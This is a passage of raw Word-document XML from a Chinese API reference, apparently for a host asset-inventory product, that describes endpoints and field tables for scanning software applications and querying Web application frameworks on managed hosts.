          <w:p w14:paraId="410E4F48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D045426" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A1D0B3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04505640" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36133EE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B5FF5DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B67D4A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69553147" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0486877C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1909867B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D78DD20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C7D031" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C8AD126" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32B0913C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38084A02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310BFDC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="341386F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C2DC377" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件应用名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42FE3CBB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AC07EF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05D2BCB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009E982B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F405B5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7600E396" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E6CA27C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A22CA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20974EE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67BA6D52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="534F59E2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B27FAEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>binPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67D19B94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4A5BEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12B560CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>windows为安装路径，Linux为二进制路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="26025592" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="263822E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>configPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="529F8554" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCAD50F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5C8FB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>配置文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15D7C5A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42997FB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C5090A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F886A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid：int(10) name：varchar(512) uname:varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535242C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>关联进程列表 pid:进程id name:进程名 uname:进程启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11C63B7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="软件应用信息扫描"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:t>软件应用信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE4D724" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求软件应用信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E6AC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F320F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/app/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7143B6DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCAF2AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCCF89D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AA575" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/external/api/assets/app/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A4E40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7478B16F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553BD467" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73504E9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE46C51"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137C06A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81C61BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DDF19D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="048AF419" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C31150" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3ED2E166" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1818E1CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D9B7634" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20125E9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BC48FF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B1DDF98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="软件应用信息查询扫描状态"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:t>软件应用信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417A662" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询软件应用信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56C11D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="web应用框架信息"/>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r>
        <w:t>Web应用框架信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B4244" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569DE2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的Web应用框架信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397D5C62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194DF4FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>Web应用框架信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC827F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E73442" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC6D97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D951ABC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>.Web应用框架信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2FA4A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web应用框架信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC1BA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web应用框架信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D4A47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77276E9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用Web应用框架信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB81BC"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203CD726" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59169C14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="web应用框架信息查询结果"/>
      <w:r>
        <w:t>Web应用框架信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E8BD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询Web应用框架信息，按每台主机每个Web应用框架进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F7E2D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6383C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/webframe/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71681F60"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370"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="3036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="46335C6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2888DF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BBA88A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E1965A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F5DA296" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E76AFE4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B6D152A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62D1D11C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26500BBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67DF596E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7CC4C692" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A46C35A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C1218B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
